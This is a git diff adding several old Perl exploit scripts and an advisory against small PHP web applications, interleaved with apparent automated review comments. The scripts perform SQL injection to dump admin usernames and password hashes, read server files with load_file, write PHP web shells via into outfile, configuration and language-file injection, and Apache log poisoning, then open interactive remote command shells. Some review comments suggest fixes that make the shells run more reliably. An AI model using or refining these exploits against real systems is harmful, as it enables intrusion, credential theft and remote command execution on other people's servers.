/var/www/logs/error.log + /usr/local/apache/logs/error.log + /var/log/error_log + /apache/logs/error.log + ); + +my $php_c0de = ""; + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +print "[*] Getting admin login details ..\n"; + +my $url = $host."/view_profile.php?id=osirys' union all select concat(0x64657461696C73,username,0x3a,password,0x64657461696C73),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,19 
from admins_lf2713 order by '*"; +my $re = get_req($url); +if ($re =~ /details(.+):(.+)details/) { + $user = $1; + $pass = $2; + print "[\$] User: $user\n"; + print "[\$] Pass: $pass\n"; +} +else { + print "[-] Can't extract admin details\n\n"; +} + +print "[*] Generating error through GET request ..\n"; + +get_req($host."/osirys_log_test".$rand); + +print "[*] Cheeking Apache Error Log path ..\n"; + +while (($log = <@error_logs>)&&($gotcha != 1)) { + $tmp_path = $host."/view_profile.php?id=osirys' union all select load_file('".$log."'),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,19 order by '*"; + $re = get_req($tmp_path); + if ($re =~ /File does not exist: (.+)\/osirys_log_test$rand/) { + $site_path = $1."/"; + $gotcha = 1; + print "[*] Error Log path found -> $log\n"; + print "[*] Website path found -> $site_path\n"; + &inj_shell; + } +} + +$gotcha == 1 || die "[-] Couldn't file error_log !\n"; + +sub inj_shell { + my $attack = $host."/view_profile.php?id=osirys' union all select 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'".$php_c0de."',19 into outfile '".$site_path."/1337.php"; + get_req($attack); + my $test = get_req($host."/1337.php"); + if ($test =~ /st4rt/) { + print "[*] Shell succesfully injected !\n"; + print "[&] Hi my master, do your job now [!]\n\n"; + $exec_path = $host."/shell.php"; + &exec_cmd; + + } + else { + print "[-] Shell not found \n[-] Exploit failed\n\n"; + exit(0); + } +} + +sub exec_cmd { + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = $host."/1337.php?cmd=".$cmd; + my $re = get_req($exec_url); + my $content = tag($re); + if ($content =~ /st4rt(.+)\*\*19/) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + chomp($out); + print "$out\n"; + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. 
Exploit Failed !\n\n"; + &exec_cmd; + } + +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub banner { + print "\n". + " ---------------------------\n". + " Graugon Forum \n". + " Command Inj Exploit \n". + " by Osirys \n". + " ---------------------------\n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Input data failed ! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-02-20] \ No newline at end of file diff --git a/Hedgehog-CMS 1.21 - Local File Inclusion Remote Command Execution.pl b/Hedgehog-CMS 1.21 - Local File Inclusion Remote Command Execution.pl new file mode 100644 index 0000000..7022b65 --- /dev/null +++ b/Hedgehog-CMS 1.21 - Local File Inclusion Remote Command Execution.pl 
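Review bot: `$exec_path = $host."/shell.php";` in `inj_shell` is assigned but never read; `exec_cmd` builds its URL from `$host."/1337.php"`, the file the `into outfile` step actually writes, so the line looks like a stale carry-over from the Fluorine script and should be removed, or `exec_cmd` should use `$exec_path` so the two agree. `$gotcha`, `$user`, `$pass`, `$site_path`, `$c` and `$cmd` are undeclared globals, and `$gotcha` is compared with `!= 1` before it is ever assigned; `use strict; use warnings;` with `my` declarations at file scope would catch this.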
@@ -0,0 +1,218 @@ +#!/usr/bin/perl + +# |----------------------------------------------------------------------------------------------------------------------------------| +# | INFORMATIONS | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Web Application : Hedgedog-CMS 1.21 | +# |Download : http://mesh.dl.sourceforge.net/sourceforge/hedgehog-cms/hedgehog-cms_v1.21.zip | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Remote Command Execution Exploit | +# |by Osirys | +# |osirys[at]autistici[dot]org | +# |osirys.org | +# |Thx&Greets to: evilsocket, athum | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |BUG [Local File Inclusion] +# | p0c : /[path]/includes/footer.php?c_temp_path=[lf]%00 +# | In source $c_temp_path is not declared, so if register_globals = On we can set its value from GET directly. +# |----------------------------------------------------------------------------------------------------------------------------------| +# |BUG [Abitrary php code writing] +# | This cms is not coded too good, we can bypass admin login just doing it via socket or lwp with $_POST[l_mode]. +# | From admin panel everything before beeing passed in a file is filtered with htmlspecialchars and other fucntions, +# | expect of the email contact variable, that's the hell bug. +# | The sploit before overwriting a previous configuration, tries to get the old one, then it executes your commands. +# |----------------------------------------------------------------------------------------------------------------------------------| + + +# ------------------------------------------------------------------ +# Exploit in action [>!] 
+# ------------------------------------------------------------------ +# osirys[~]>$ perl lolzo.txt http://localhost/hedgehog-cms/ +# +# -------------------------------- +# Hedgedog-CMS RCE Exploit +# by Osirys +# -------------------------------- +# +# [*] Getting old configuration data .. +# [*] Overwriting configuration data .. +# [*] Overwrite succesfully ! +# [&] Hi my master, do your job now [!] +# +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> pwd +# /home/osirys/web/hedgehog-cms/config +# shell[localhost]$> la +# bash: la: command not found +# shell[localhost]$> exit +# [-] Quitting .. +# osirys[~]>$ +# ------------------------------------------------------------------ + +use LWP::UserAgent; +use IO::Socket; +use HTTP::Request::Common; + +my $post_pag = "/specialacts.php"; +my $rce_path = "/config/userconfig.php"; +my $rce_c0de = "%22%3Bsystem%28%24_GET%5Bcmd%5D%29%3B+%24xy+%3D+%22"; +my $host = $ARGV[0]; + + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +my $ua_url = $host.$post_pag; +my $ua = LWP::UserAgent->new; +my $re = $ua->request(POST $ua_url, + Content_Type => 'multipart/form-data', + Content => [l_mode => '33'] + ); + +if ($re->is_success) { + $data = $re->content; + print "[*] Getting old configuration data ..\n"; + get_old_data($data); + &overwrite; +} +else { + print "[-] Unable to get old configuration data ..\n"; + print "[*] Overwriting existing configuration ! \n"; + &overwrite; +} + +sub overwrite { + if ($old_data_gotcha != 1) { + $title = "Website"; + $username = "Username"; + $contact = "admin\@admin.com"; + $copyright = "2007 website"; + } + + my $url = $path.$post_pag; + + my $code= "e_maintitle=". $title."&e_autor=".$username."&e_contact=". $contact. $rce_c0de. + "&e_copyright=".$copyright."&e_theme=.%2Ftemp%2Fstrawberry%2F&e_language=engli". 
+ "sh.lng&e_favicon=&e_sp=true&e_version=true&e_guestbook=true&l_mode=35"; + + my $length = length($code); + + my $data = "POST ".$url." HTTP/1.1\r\n". + "Host: ".$h0st."\r\n". + "Keep-Alive: 300\r\n". + "Connection: keep-alive\r\n". + "Content-Type: application/x-www-form-urlencoded\r\n". + "Content-Length: ".$length."\r\n\r\n". + $code."\r\n"; + + my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n"; + + print "[*] Overwriting configuration data ..\n"; + $socket->send($data); + + while ((my $e = <$socket>)&&($own != 1)) { + if ($e =~ /The configurations have been saved successfully/) { + print "[*] Overwrite succesfully !\n"; + $own = 1; + } + } + + $own == 1 || die "[-] Can't overwrite configuration data !\n"; + + print "[&] Hi my master, do your job now [!]\n\n"; + &exec_cmd; +} + +sub exec_cmd { + my(@outs,$out); + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $exec_url = $host.$rce_path."?cmd=".$cmd; + $re = get_req($exec_url); + if ($re =~ /./) { + print $re; + &exec_cmd; + } + else { + $c++; + $cmd =~ s/\n//; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n"; + &exec_cmd; + } +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." 
".$path; + return $full_det; +} + +sub get_old_data() { + my $re = $_[0]; + if ($re =~ /name="e_maintitle" value="(.*)" size/) { $title = $1; } + if ($re =~ /name="e_autor" value="(.*)" size/) { $username = $1; } + if ($re =~ /name="e_contact" value="(.*)" size/) { $contact = $1; } + if ($re =~ /name="e_copyright" value="(.*)" size/) { $copyright = $1; } + $old_data_gotcha = 1; +} + +sub banner { + print "\n". + " -------------------------------- \n". + " Hedgedog-CMS RCE Exploit \n". + " by Osirys \n". + " -------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Bad hostname! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-02-09] \ No newline at end of file diff --git a/InselPhoto 1.1 - SQL Injection.pl b/InselPhoto 1.1 - SQL Injection.pl new file mode 100644 index 0000000..0af47a9 --- /dev/null +++ b/InselPhoto 1.1 - SQL Injection.pl 
@@ -0,0 +1,249 @@ +#!/usr/bin/perl + +# |----------------------------------------------------------------------------------------------------------------------------------| +# | INFORMATIONS | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Web Application : InselPhoto v1.1 | +# |Download : http://www.inselphoto.com/download.php?p=get_inselphoto | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |Remote Exploit (Admin credentials extract + File Disclosure via Sql Injection) | +# |by Osirys | +# |osirys[at]autistici[dot]org | +# |osirys.org | +# |Greets to: evilsocket, Fireshot, Todd and str0ke | +# |----------------------------------------------------------------------------------------------------------------------------------| +# |BUG [Sql Injection] +# | Vulnerable file is: /[path]/search.php line 37 +# |SQL Injections used by this sploit : +# |[1] ' union select 0,0,concat(username,0x3a,password),0,0,0,0,0 from inselphoto_users# +# |[2] ' union select 0,0,load_file('lf'),0,0,0,0,0# +# |----------------------------------------------------------------------------------------------------------------------------------| +# |This CMS is vulnerable to sql injection.This simple exploit just uses the sql bug to get admin credentials (username,password) and +# |uses load_file() mysql function to disclosure local file on the server. +# |This time no RCE exploit avaiable, becouse POST query is filtered with htmlentities, so will be impossible to write php code into +# |a file, for the fact that < > char will be html encoded. 
+# |----------------------------------------------------------------------------------------------------------------------------------| + + +# -----------------------------------------------------------------------------------------------------------------------------------| +# Exploit in action [>!] +# -----------------------------------------------------------------------------------------------------------------------------------| +# osirys[~]>$ perl sql2.txt http://localhost/InselPhoto/ admin_hash +# +# ----------------------------------- +# InselPhoto SQL Injection Sploit +# Coded by Osirys +# ----------------------------------- +# +# [*] Extracting users credentials .. +# +# [*] Username: admin +# [*] Password: 5f4dcc3b5aa765d61d8327deb882cf99 +# +# [*] Username: osirys +# [*] Password: 6e1459df459890dfd8b4c3687c18abba +# +# [!] Succesfully Exploited ! +# +# osirys[~]>$ +# -----------------------------------------------------------------------------------------------------------------------------------| +# osirys[~]>$ perl sql2.txt http://localhost/InselPhoto/ file_disc +# +# ----------------------------------- +# InselPhoto SQL Injection Sploit +# Coded by Osirys +# ----------------------------------- +# +# [*] cat /home/osirys/test.txt +# Local file loaded :D +# +# [*] cat exit +# [-] Quitting .. 
+# osirys[~]>$ +# -----------------------------------------------------------------------------------------------------------------------------------| + +use IO::Socket; + +my $host = $ARGV[0]; +my $expl = $ARGV[1]; + +my $sql_inj_path = "/search.php"; + +($host,$expl) || help("-1"); +cheek($host,$expl) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +&adm_hash if $expl_way == 1; +&file_discl if $expl_way == 2; + +sub adm_hash { + my $url = $path.$sql_inj_path; + + my $code= "query=%27+union+select+0%2C0%2Cconcat%28username%2C0x3a%2Cpassword%29%2C0%2C0%2C0%2C0%2C0+from+inselphoto_users%23&type=photo"; + + my $length = length($code); + + my $data = "POST ".$url." HTTP/1.1\r\n". + "Host: ".$h0st."\r\n". + "Keep-Alive: 300\r\n". + "Connection: keep-alive\r\n". + "Content-Type: application/x-www-form-urlencoded\r\n". + "Content-Length: ".$length."\r\n\r\n". + $code."\r\n"; + + my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n"; + + print "[*] Extracting users credentials ..\n\n"; + $socket->send($data); + + while (my $e = <$socket>) { + if ($e =~ /([a-zA-Z0-9-_.]{2,15}):([a-f0-9]{32})/) { + $gotcha = 1; + print "[*] Username: $1\n"; + print "[*] Password: $2\n\n"; + } + } + + if ($gotcha != 1) { + print "[-] Can't extract users credentials\n[-] Exploit Failed !\n\n"; + exit(0); + } + + print "[!] Succesfully Exploited !\n\n"; + exit(0); +} + +sub file_discl { + my @outs; + print "[*] cat "; + my $file = ; + chomp($file); + $file !~ /exit/ || die "[-] Quitting ..\n"; + if ($file !~ /\/(.*)/) { + print "\n[-] Bad filename !\n"; + &file_discl; + } + + my $url = $path.$sql_inj_path; + my $lfile = html($file); + my $code= "query=%27+union+select+0%2C0%2Cload_file%28%27".$lfile."%27%29%2C0%2C0%2C0%2C0%2C0%23&type=photo"; + + my $length = length($code); + + my $data = "POST ".$url." HTTP/1.1\r\n". 
+ "Host: ".$h0st."\r\n". + "Keep-Alive: 300\r\n". + "Connection: keep-alive\r\n". + "Content-Type: application/x-www-form-urlencoded\r\n". + "Content-Length: ".$length."\r\n\r\n". + $code."\r\n"; + + my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n"; + + $socket->send($data); + + while ((my $e = <$socket>)&&($stop != 1)) { + if ($e =~ /\/0\/0' rel='lightbox\[insel\]/) { + $stop = 1; + } + push(@outs,$e); + } + my $out = join '', @outs; + my $content = tag($out); + if ($content =~ /\$href='users\/\*\*(.+)\/0\/0'\$rel='lightbox\[insel\]/) { + my $out = $1; + $out =~ s/\$/ /g; + $out =~ s/\*/\n/g; + $out =~ s/$out/$out\n/ if ($out !~ /\n$/); + print "$out\n"; + &file_discl; + } + else { + $c++; + print "[-] Can't find ".$file." \n"; + $c < 3 || die "[-] File Disclosure failed !\n[-] Something wrong. Exploit Failed !\n\n"; + &file_discl; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub tag() { + my $string = $_[0]; + $string =~ s/ /\$/g; + $string =~ s/\s/\*/g; + return($string); +} + +sub html() { + my $string = $_[0]; + $string =~ s/\//\%2F/g; + $string =~ s/\\/\%5C/g; + return($string); +} + +sub cheek() { + my $host = $_[0]; + my $expl = $_[1]; + if ($host =~ /http:\/\/(.*)/) { + $ch_host = 1; + } + if ($expl =~ /admin_hash/) { + $ch_expl = 1; + $expl_way = 1; + } + elsif ($expl =~ /file_disc/) { + $ch_expl = 1; + $expl_way = 2; + } + return 1 if ((($ch_host)&&($ch_expl)) == 1); + &help("-2"); +} + +sub banner { + print "\n". + " -----------------------------------\n". + " InselPhoto SQL Injection Sploit \n". + " Coded by Osirys \n". 
+ " -----------------------------------\n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Input Error, missed some arguments !\n\n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad arguments !\n\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path admin_hash\n"; + print " Ex: perl $0 http://site.it/cms/ admin_hash\n"; + print "[*] Usage : perl $0 http://hostname/cms_path file_disc\n"; + print " Ex: perl $0 http://site.it/cms/ file_disc\n"; + exit(0); +} + +# milw0rm.com [2009-02-11] \ No newline at end of file diff --git a/LinPHA Photo Gallery 2.0 - Remote Command Execution.pl b/LinPHA Photo Gallery 2.0 - Remote Command Execution.pl new file mode 100644 index 0000000..3257c90 --- /dev/null +++ b/LinPHA Photo Gallery 2.0 - Remote Command Execution.pl 
@@ -0,0 +1,218 @@ +#!/usr/bin/perl + +# ----------------------------------------------------------------------------------------------------------------------- +# INFORMATIONS +# ----------------------------------------------------------------------------------------------------------------------- +# LinPHA Photo Gallery 2.0 Alpha +# http://sourceforge.net/project/downloading.php?group_id=64772&use_mirror=heanet&filename=linpha2-alpha1.tar.gz&94291669 +# Remote Command Execution Exploit +# by Osirys +# osirys[at]live[dot]it +# osirys.org + +# Greets to: x0r, str0ke, emgent, and my big friend Jay +# Tested in local with: magic quotes => Off + +# ------------------------------------------------------------------ +# Exploit in action :D +# ------------------------------------------------------------------ +# osirys[~]>$ perl rce.txt http://localhost/linpha2/ +# +# ------------------------------------------- +# LinPHA 2.0a Code Execution Exploit +# Coded by Osirys +# ------------------------------------------- +# +# [+] New Language added ! +# [+] Editing new Language .. +# [+] New Language Edited ! +# [*] Hi my master, execute your commands ! +# +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> ls +# lang.freedom.php +# lang.freedom.php.bak +# language.php +# language.php~ +# shell[localhost]$> pwd +# /home/osirys/web/linpha2/lib/lang +# shell[localhost]$> exit +# [-] Quitting .. 
+# osirys[~]>$ +# ------------------------------------------------------------------ + +use LWP::UserAgent; +use IO::Socket; +use HTTP::Request::Common; + +my $new_lang_name = "freedom"; +my $add_lang_path = "/lib/lang/language.php?action=create_file"; +my $edt_lang_path = "/lib/lang/language.php?action=edit_lang&language="; +my $rce_path = "/lib/lang/lang".$new_lang_name.".php"; +my $phpc0de = "%22%29%3Bsystem%28%24_GET%5Bcmd%5D%29%3B%24a%3D+array%28%22"; +my $i = 0; +my $c = 0; +my $host = $ARGV[0]; + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + +&new_lang_create($new_lang_name); + +sub new_lang_create() { + my $new_lang_name = $_[0]; + my $url = $host.$add_lang_path; + + my $ua = LWP::UserAgent->new; + my $re = $ua->request(POST $url, + Content_Type => 'form-data', + Content => [ + filename => $new_lang_name, + action => 'create_file', + submit => 'submit' + ] + ); + + if (($re->is_success)&&($re->as_string =~ /File already exists!/)) { + $i++; + print "[+] Language already exists, creating a new one ..\n"; + $new_lang_name = "freedom".$i; + $edt_lang_path = "/lib/lang/language.php?action=edit_lang&language=".$new_lang_name; + &new_lang_create($new_lang_name); + } + elsif (($re->is_success)&&($re->as_string =~ /Fine - now please go/)) { + print "[+] New Language added !\n"; + &new_lang_edit($new_lang_name); + } + else { + print "[-] Unable to add a new language\n"; + print "[-] Exploit Failed\n\n"; + exit(0); + } +} + +sub new_lang_edit() { + my $new_lang_name = $_[0]; + my $url = $path.$edt_lang_path; + my $code = "phrase%5BAlbums%0D%0A%5D%5B%5D=".$phpc0de."&phrase%5BExtended+Search%0D%0A%5D%5B%5D=". + "&phrase%5BHi%2C+this+is+the+home+of+%22The+PHP+Photo+Archive%22+%3Ca+href%3D%22http%". + "3A%2F%2Flinpha.sf.net%22%3Eaka+LinPHA%3C%2Fa%3E.%0D%0A%5D%5B%5D=&phrase%5BHome%0D%0A". 
+ "%5D%5B%5D=&phrase%5BLinpha+Syslog%0D%0A%5D%5B%5D=&phrase%5BLogin%0D%0A%5D%5B%5D=&phr". + "ase%5BPassword%0D%0A%5D%5B%5D=&phrase%5BRemember+Me%0D%0A%5D%5B%5D=&phrase%5BSearch%". + "0D%0A%5D%5B%5D=&phrase%5BUsername%0D%0A%5D%5B%5D=&phrase%5BWelcome%0D%0A%5D%5B%5D=&p". + "hrase%5BYou+must+have+cookies+enabled+to+log+in.%0D%0A%5D%5B%5D=&action=save_lang&la". + "nguage=..%2F..%2Flib%2Flang%2Flang.".$new_lang_name.".php&submit=submit"; + my $length = length($code); + my $data = "POST ".$url." HTTP/1.1\r\n". + "Host: ".$h0st."\r\n". + "Keep-Alive: 300\r\n". + "Connection: keep-alive\r\n". + "Content-Type: application/x-www-form-urlencoded\r\n". + "Content-Length: ".$length."\r\n\r\n". + $code."\r\n"; + + my $socket = new IO::Socket::INET( + PeerAddr => $h0st, + PeerPort => '80', + Proto => 'tcp', + ) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n"; + + print "[+] Editing new Language ..\n"; + $socket->send($data); + + while ((my $e = <$socket>)&&($inj_t != 1)) { + if ($e =~ /Welcome To LinPHA2 Translation Module/) { + print "[+] New Language Edited !\n"; + print "[*] Hi my master, execute your commands !\n\n"; + $inj_t = 1; + } + } + $inj_t == 1 || die "[-] Unable to edit new Language ! \n"; + + &exec_cmd($new_lang_name); +} + +sub exec_cmd() { + my $new_lang_name = $_[0]; + my @outs; + $h0st !~ /www\./ || $h0st =~ s/www\.//; + print "shell[$h0st]\$> "; + $cmd = ; + $cmd !~ /exit/ || die "[-] Quitting ..\n"; + $rce_path = "/lib/lang/lang.".$new_lang_name.".php"; + $exec_url = ($host.$rce_path."?cmd=".$cmd); + $re = get_req($exec_url); + if ($re =~ /(.*)/) { + push(@outs,$re); + foreach my $o(@outs) { + print "$o"; + } + &exec_cmd; + } + elsif ($re !~ /[a-z0-9]/) { + $c++; + print "bash: ".$cmd.": command not found\n"; + $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. 
Exploit Failed !\n\n"; + &exec_cmd; + } +} + +sub get_req() { + $link = $_[0]; + my $req = HTTP::Request->new(GET => $link); + my $ua = LWP::UserAgent->new(); + $ua->timeout(4); + my $response = $ua->request($req); + return $response->content; +} + +sub cheek() { + my $host = $_[0]; + if ($host =~ /http:\/\/(.*)/) { + return 1; + } + else { + return 0; + } +} + +sub get_input() { + my $host = $_[0]; + $host =~ /http:\/\/(.*)/; + $s_host = $1; + $s_host =~ /([a-z.-]{1,30})\/(.*)/; + ($h0st,$path) = ($1,$2); + $path =~ s/(.*)/\/$1/; + $full_det = $h0st." ".$path; + return $full_det; +} + +sub banner { + print "\n". + " ------------------------------------------- \n". + " LinPHA 2.0a Code Execution Exploit \n". + " Coded by Osirys \n". + " ------------------------------------------- \n\n"; +} + +sub help() { + my $error = $_[0]; + if ($error == -1) { + &banner; + print "\n[-] Bad hostname! \n"; + } + elsif ($error == -2) { + &banner; + print "\n[-] Bad hostname address !\n"; + } + print "[*] Usage : perl $0 http://hostname/cms_path\n\n"; + exit(0); +} + +# milw0rm.com [2009-01-20] \ No newline at end of file diff --git a/Mediatheka 4.2 Local File Inclusion.txt b/Mediatheka 4.2 Local File Inclusion.txt new file mode 100644 index 0000000..c8327ae --- /dev/null +++ b/Mediatheka 4.2 Local File Inclusion.txt 
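Review bot: In `exec_cmd` the test `if ($re =~ /(.*)/)` is true for every response, including an empty one, because `.*` matches the empty string, so the `elsif ($re !~ /[a-z0-9]/)` fallback that reports "command not found" and aborts after three failures is unreachable; `if (length $re)` or `if ($re =~ /\S/)` expresses the intent. The recursive `&exec_cmd;` calls work only because the ampersand-without-parens form passes the current `@_` through, which is how `$new_lang_name` survives into the next iteration; calling `exec_cmd($new_lang_name)` explicitly makes that dependency visible instead of relying on a Perl quirk. The command is also appended to the URL unencoded and with its newline intact, `$exec_url = ($host.$rce_path."?cmd=".$cmd);`, so anything containing a space or `&` does not reach the injected `system()` as typed — `chomp` plus URI escaping fixes that. `$cmd = ;` is not valid Perl as rendered; presumably `<STDIN>` was lost in HTML conversion.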
@@ -0,0 +1,38 @@ +[START] + +######################################################################################### +[0x01] Informations: + +Script : Mediatheka 4.2 +Download : http://www.hotscripts.com/jump.php?listing_id=79106&jump_type=1 +Vulnerability : Local File Inclusion +Author : Osirys +Contact : osirys[at]live[dot]it +Notes : Proud to be Italian +Greets: : XaDoS, x0r, emgent, Jay, str0ke + +######################################################################################### +[0x02] Bug:[Local File Inclusion] +###### + +Bugged file is: /[path]/index.php + +[CODE] + + if(isset($_GET['lang'])) + $lang = $_GET['lang']; + else + $lang = 'en'; + include("langs/$lang.php"); + +[/CODE] + + +[!] EXPLOIT: /[path]/index.php?lang=[local_file_to_include] + ../../../../../../../../../../../etc/passwd%00 +######################################################################################### + +[/END] + +# milw0rm.com [2008-12-14] + \ No newline at end of file diff --git a/My Simple Forum 7.1 - Remote Command Execution.pl b/My Simple Forum 7.1 - Remote Command Execution.pl new file mode 100644 index 0000000..473cdee --- /dev/null +++ b/My Simple Forum 7.1 - Remote Command Execution.pl 
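Review bot: The advisory shows the include and the traversal payload but no fix, and the fix a maintainer needs is an allowlist rather than filtering: `$langs = array('en'); /* the names actually present in langs/ */` and `$lang = (isset($_GET['lang']) && in_array($_GET['lang'], $langs, true)) ? $_GET['lang'] : 'en';` before `include("langs/$lang.php");`, so the include path is never built from unvalidated input (a `preg_match('/^[a-z]{2}$/', $_GET['lang'])` guard is the minimal alternative). The `%00` terminator in the exploit line only truncates the path on PHP releases before 5.3.4, which rejected embedded NULs in paths; on later versions that URL fails, while the include remains exploitable with a target path that already ends in `.php`, so the caveat belongs next to the exploit line.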
@@ -0,0 +1,209 @@ +#!/usr/bin/perl + +# My Simple Forum v7.1 +# Remote Command Execution Exploit (Apache Log Poisoning/Injection) +# Local File Inclusion at /theme/default/index.template.php?action=[lf]%00 +# XSS at /theme/default/index.template.php?Name=[XSS] - This needs Register Globals ON +# Credits to Giovanni Buzzin, "Osirys" +# osirys[at]autistici[dot]org + +# --------------------------------------------------------------------------------------- +# Exploit on Local +# --------------------------------------------------------------------------------------- +# osirys[~]>$ perl spl.txt http://localhost/MySimpleForum_v.7.1/ +# +# --------------------------------- +# My Simple Forum RCE Sploit +# (Log Inj) +# by Osirys +# --------------------------------- +# +# [*] Injecting evil php code .. +# [*] Cheeking for Apache Logs .. +# [*] Apache Log Injection completed +# [*] Path: /var/log/httpd/access_log +# [!] Hi my master, do your job now [x] +# +# shell[localhost]$> pwd +# /home/osirys/web/MySimpleForum_v.7.1 +# shell[localhost]$> id +# uid=80(apache) gid=80(apache) groups=80(apache) +# shell[localhost]$> exit +# [-] Quitting .. 
+# +# osirys[~]>$ +# --------------------------------------------------------------------------------------- + + +use IO::Socket::INET; +use LWP::UserAgent; + +my $host = $ARGV[0]; +my $lfi_path = "/index.php?action="; +my $null_byte = "%00"; +my $rand_a = int(rand 150); +my $rand1 = "1337".$rand_a."1337"; +my $rand_b = int(rand 150); +my $rand2 = "1337".$rand_b."1337"; +my $gotcha = 0; +my $dir_trasv = "../../../../../../../../../.."; +my @logs_dirs = qw( + /var/log/httpd/access_log + /var/log/httpd/access.log + /var/log/httpd/error.log + /var/log/httpd/error_log + /var/log/access_log + /logs/error.log + /logs/access.log + /var/log/apache/error_log + /var/log/apache/error.log + /etc/httpd/logs/access_log + /usr/local/apache/logs/error_log + /etc/httpd/logs/access.log + /etc/httpd/logs/error_log + /etc/httpd/logs/error.log + /usr/local/apache/logs/access_log + /usr/local/apache/logs/access.log + /var/www/logs/access_log + /var/www/logs/access.log + /var/log/apache/access_log + /var/log/apache/access.log + /var/log/access_log + /var/www/logs/error_log + /var/www/logs/error.log + /usr/local/apache/logs/error.log + /var/log/error_log + /apache/logs/error.log + /apache/logs/access.log + ); + +my $php_code = ""; + +($host) || help("-1"); +cheek($host) == 1 || help("-2"); +&banner; + +$datas = get_input($host); +$datas =~ /(.*) (.*)/; +($h0st,$path) = ($1,$2); + + +$sock = IO::Socket::INET->new( + PeerAddr => $h0st, + PeerPort => 80, + Proto => "tcp" + ) || die "Can't connect to $host:80!\n"; + +print "[*] Injecting evil php code ..\n"; + + +print $sock "GET /Osirys_log_inj start0".$rand1.$php_code."0end".$rand2." 
